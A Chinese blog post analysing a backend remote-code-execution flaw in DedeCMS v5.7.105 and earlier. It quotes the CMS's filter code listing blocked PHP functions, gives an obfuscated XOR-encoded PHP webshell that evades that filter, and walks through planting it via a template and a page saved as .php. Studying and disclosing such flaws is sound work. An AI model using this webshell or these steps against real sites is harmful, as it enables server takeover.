<!DOCTYPE html>
<html lang="zh-cn">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"wanheiqiyihu.top","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="【漏洞分析】织梦后台rce &lt;&#x3D;dedecms v5.7.105环境下载https:&#x2F;&#x2F;updatenew.dedecms.com&#x2F;base-v57&#x2F;package&#x2F;DedeCMS-V5.7.105-UTF8.zip 原本官网是没有这个版本了，但是改一下url就可以找到历史版本。 受影响的版本 &lt;&#x3D;dedecms v5.7.105 我们这里找到dedecms v5.7.105进行分析">
<meta property="og:type" content="article">
<meta property="og:title" content="【漏洞分析】织梦后台rce &lt;&#x3D;dedecms v5.7.105">
<meta property="og:url" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/index.html">
<meta property="og:site_name" content="十三の博客">
<meta property="og:description" content="【漏洞分析】织梦后台rce &lt;&#x3D;dedecms v5.7.105环境下载https:&#x2F;&#x2F;updatenew.dedecms.com&#x2F;base-v57&#x2F;package&#x2F;DedeCMS-V5.7.105-UTF8.zip 原本官网是没有这个版本了，但是改一下url就可以找到历史版本。 受影响的版本 &lt;&#x3D;dedecms v5.7.105 我们这里找到dedecms v5.7.105进行分析">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230306182541957.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230306182549540.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230306185621108.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230307211254494.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212053856.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212157094.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212245028.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212316773.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212343348.png">
<meta property="og:image" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212444451.png">
<meta property="article:published_time" content="2023-03-07T13:16:16.000Z">
<meta property="article:modified_time" content="2023-03-07T13:16:53.162Z">
<meta property="article:author" content="十三">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230306182541957.png">

<link rel="canonical" href="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-cn'
  };
</script>

  <title>【漏洞分析】织梦后台rce <=dedecms v5.7.105 | 十三の博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">十三の博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-ctf做题笔记">

    <a href="/categories/Experience" rel="section"><i class="download fa-fw"></i>CTF做题笔记</a>

  </li>
        <li class="menu-item menu-item-python">

    <a href="/categories/python" rel="section"><i class="download fa-fw"></i>python</a>

  </li>
        <li class="menu-item menu-item-java">

    <a href="/categories/java" rel="section"><i class="download fa-fw"></i>java</a>

  </li>
        <li class="menu-item menu-item-读书笔记">

    <a href="/categories/readbook" rel="section"><i class="download fa-fw"></i>读书笔记</a>

  </li>
        <li class="menu-item menu-item-渗透测试">

    <a href="/categories/penetration" rel="section"><i class="download fa-fw"></i>渗透测试</a>

  </li>
        <li class="menu-item menu-item-基础">

    <a href="/categories/basic" rel="section"><i class="download fa-fw"></i>基础</a>

  </li>
        <li class="menu-item menu-item-轮子">

    <a href="/categories/lunzi" rel="section"><i class="download fa-fw"></i>轮子</a>

  </li>
        <li class="menu-item menu-item-漏洞库">

    <a href="/categories/fuxian" rel="section"><i class="download fa-fw"></i>漏洞库</a>

  </li>
        <li class="menu-item menu-item-工具">

    <a href="/categories/tools" rel="section"><i class="download fa-fw"></i>工具</a>

  </li>
        <li class="menu-item menu-item-代码审计">

    <a href="/categories/daima" rel="section"><i class="download fa-fw"></i>代码审计</a>

  </li>
        <li class="menu-item menu-item-逆向">

    <a href="/categories/nixiang" rel="section"><i class="download fa-fw"></i>逆向</a>

  </li>
        <li class="menu-item menu-item-应急响应">

    <a href="/categories/yingji" rel="section"><i class="download fa-fw"></i>应急响应</a>

  </li>
        <li class="menu-item menu-item-免杀">

    <a href="/categories/miansha" rel="section"><i class="download fa-fw"></i>免杀</a>

  </li>
        <li class="menu-item menu-item-靶场">

    <a href="/categories/bachang" rel="section"><i class="download fa-fw"></i>靶场</a>

  </li>
        <li class="menu-item menu-item-cve申请">

    <a href="/categories/cve" rel="section"><i class="download fa-fw"></i>cve申请</a>

  </li>
        <li class="menu-item menu-item-c语言">

    <a href="/categories/c" rel="section"><i class="download fa-fw"></i>c语言</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-cn">
    <link itemprop="mainEntityOfPage" href="https://wanheiqiyihu.top/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="十三">
      <meta itemprop="description" content="潜心学习，不骄不躁">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="十三の博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          【漏洞分析】织梦后台rce <=dedecms v5.7.105
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-03-07 21:16:16 / 修改时间：21:16:53" itemprop="dateCreated datePublished" datetime="2023-03-07T21:16:16+08:00">2023-03-07</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/fuxian/" itemprop="url" rel="index"><span itemprop="name">-fuxian</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="【漏洞分析】织梦后台rce-lt-dedecms-v5-7-105"><a href="#【漏洞分析】织梦后台rce-lt-dedecms-v5-7-105" class="headerlink" title="【漏洞分析】织梦后台rce &lt;=dedecms v5.7.105"></a>【漏洞分析】织梦后台rce &lt;=dedecms v5.7.105</h1><h1 id="环境下载"><a href="#环境下载" class="headerlink" title="环境下载"></a>环境下载</h1><p><a target="_blank" rel="noopener" href="https://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7.105-UTF8.zip">https://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7.105-UTF8.zip</a></p>
<p>原本官网是没有这个版本了，但是改一下url就可以找到历史版本。</p>
<p>受影响的版本 &lt;=dedecms v5.7.105</p>
<p>我们这里找到dedecms v5.7.105进行分析</p>
<p>至于环境搭建。</p>
<p>下载下来之后放到phpstudy上面就可以了</p>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><p>漏洞出现的文件在<code>uploads/dede/templets_one_edit.php</code></p>
<p><img src="/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230306182541957.png" alt="image-20230306182541957"></p>
<p><img src="/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230306182549540.png" alt="image-20230306182549540"></p>
<p>找到漏洞点</p>
<p><img src="/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230306185621108.png" alt="image-20230306185621108"></p>
<p>在这里正则匹配了用户的文件名之后，没有对文件名的合法性进行检测，导致了攻击者可以创建任意类型文件，从而getshell。但是这里需要引用模板，而出创建模板文件的地方存在安全过滤，路径如下<code>\uploads\dede\tpl.php</code></p>
<p>其过滤代码大概如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 不允许这些字符</span></span><br><span class="line"><span class="variable">$content</span> = preg_replace(<span class="string">&quot;#(/\*)[\s\S]*(\*/)#i&quot;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$content</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">global</span> <span class="variable">$cfg_disable_funs</span>;</span><br><span class="line"><span class="variable">$cfg_disable_funs</span> = <span class="keyword">isset</span>(<span class="variable">$cfg_disable_funs</span>) ? <span class="variable">$cfg_disable_funs</span> : <span class="string">&#x27;phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace&#x27;</span>;</span><br><span class="line"><span class="variable">$cfg_disable_funs</span> = <span class="variable">$cfg_disable_funs</span>.<span class="string">&#x27;,[$]_GET,[$]_POST,[$]_REQUEST,[$]_FILES,[$]_COOKIE,[$]_SERVER,include,create_function,array_map,call_user_func,call_user_func_array,array_filert&#x27;</span>;</span><br><span class="line"><span class="keyword">foreach</span> (explode(<span class="string">&quot;,&quot;</span>, <span class="variable">$cfg_disable_funs</span>) <span class="keyword">as</span> <span class="variable">$value</span>) &#123;</span><br><span class="line">    <span class="variable">$value</span> = str_replace(<span class="string">&quot; &quot;</span>, <span class="string">&quot;&quot;</span>, <span class="variable">$value</span>);</span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$value</span>) &amp;&amp; preg_match(<span class="string">&quot;#[^a-z]+[&#x27;\&quot;]*<span class="subst">&#123;$value&#125;</span>[&#x27;\&quot;]*[\s]*[([&#123;]#i&quot;</span>, <span class="string">&quot; <span class="subst">&#123;$content&#125;</span>&quot;</span>) == <span class="literal">TRUE</span>) &#123;</span><br><span class="line">        <span class="variable">$content</span> = dede_htmlspecialchars(<span class="variable">$content</span>);</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;DedeCMS提示：当前页面中存在恶意代码！&lt;pre&gt;<span class="subst">&#123;$content&#125;</span>&lt;/pre&gt;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&quot;#^[\s\S]+&lt;\?(php|=)?[\s]+#i&quot;</span>, <span class="string">&quot; <span class="subst">&#123;$content&#125;</span>&quot;</span>) == <span class="literal">TRUE</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU&quot;</span>, <span class="string">&quot; <span class="subst">&#123;$content&#125;</span>&quot;</span>) == <span class="literal">TRUE</span>) &#123;</span><br><span class="line">        <span class="variable">$content</span> = dede_htmlspecialchars(<span class="variable">$content</span>);</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;DedeCMS提示：当前页面中存在恶意代码！&lt;pre&gt;<span class="subst">&#123;$content&#125;</span>&lt;/pre&gt;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU&quot;</span>, <span class="string">&quot; <span class="subst">&#123;$content&#125;</span>&quot;</span>) == <span class="literal">TRUE</span>) &#123;</span><br><span class="line">        <span class="variable">$content</span> = dede_htmlspecialchars(<span class="variable">$content</span>);</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;DedeCMS提示：当前页面中存在恶意代码！&lt;pre&gt;<span class="subst">&#123;$content&#125;</span>&lt;/pre&gt;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;#[`][\s\S]*[`]#i&quot;</span>, <span class="string">&quot; <span class="subst">&#123;$content&#125;</span>&quot;</span>) == <span class="literal">TRUE</span>) &#123;</span><br><span class="line">        <span class="variable">$content</span> = dede_htmlspecialchars(<span class="variable">$content</span>);</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;DedeCMS提示：当前页面中存在恶意代码！&lt;pre&gt;<span class="subst">&#123;$content&#125;</span>&lt;/pre&gt;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>好难绕啊，但是在tools发现了一个马给绕过去了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span>  @(<span class="string">&quot;Y;HJ(Z&quot;</span>^<span class="string">&quot;8H;/Z.&quot;</span>)($&#123;<span class="string">&quot;~?&#125;$&quot;</span>^<span class="string">&quot;!x8p&quot;</span>&#125;[<span class="number">1</span>]);<span class="comment">//密码是1</span></span><br></pre></td></tr></table></figure>

<p><img src="/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230307211254494.png" alt="image-20230307211254494"></p>
<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><p>首先进入默认模板管理，新建一个模板</p>
<p><img src="/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212053856.png" alt="image-20230305212053856"></p>
<p>然后创建一个模板，内容需要免杀的shell，要不然利用不了（分析的地方写了</p>
<p><img src="/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212157094.png" alt="image-20230305212157094"></p>
<p>命名为78.htm</p>
<p>随后来到核心-但也文档管理</p>
<p><img src="/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212245028.png" alt="image-20230305212245028"></p>
<p>创建一个页面，引用刚刚创建的78模板，然后文件名的后缀名改成php</p>
<p><img src="/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212316773.png" alt="image-20230305212316773"></p>
<p><img src="/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212343348.png" alt="image-20230305212343348"></p>
<p>来到目录<code>/uploads/a/newfile1.php</code></p>
<p>即可看到模板中的恶意代码成功执行</p>
<p><img src="/2023/03/07/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-dedecms-v5-7-105/image-20230305212444451.png" alt="image-20230305212444451"></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/03/07/%E3%80%90%E5%AE%9E%E6%88%98%E3%80%91%E4%BB%8Erce%E5%88%B0%E4%B8%8A%E9%A9%AC%E5%88%B0%E8%84%8F%E7%89%9B%E6%8F%90%E6%9D%83%E5%88%B0%E5%86%85%E7%BD%91/" rel="prev" title="【实战】从rce到上马到脏牛提权到内网">
      <i class="fa fa-chevron-left"></i> 【实战】从rce到上马到脏牛提权到内网
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/03/08/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91%E8%87%B4%E7%BF%94OA-msglog-aspx-SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/" rel="next" title="【漏洞复现】致翔OA msglog.aspx SQL注入漏洞">
      【漏洞复现】致翔OA msglog.aspx SQL注入漏洞 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E3%80%90%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E3%80%91%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0rce-lt-dedecms-v5-7-105"><span class="nav-number">1.</span> <span class="nav-text">【漏洞分析】织梦后台rce &lt;&#x3D;dedecms v5.7.105</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E4%B8%8B%E8%BD%BD"><span class="nav-number">2.</span> <span class="nav-text">环境下载</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="nav-number">3.</span> <span class="nav-text">漏洞分析</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">4.</span> <span class="nav-text">漏洞复现</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="十三"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">十三</p>
  <div class="site-description" itemprop="description">潜心学习，不骄不躁</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">175</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">十三</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"live2d-widget-model-tsumiki"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>
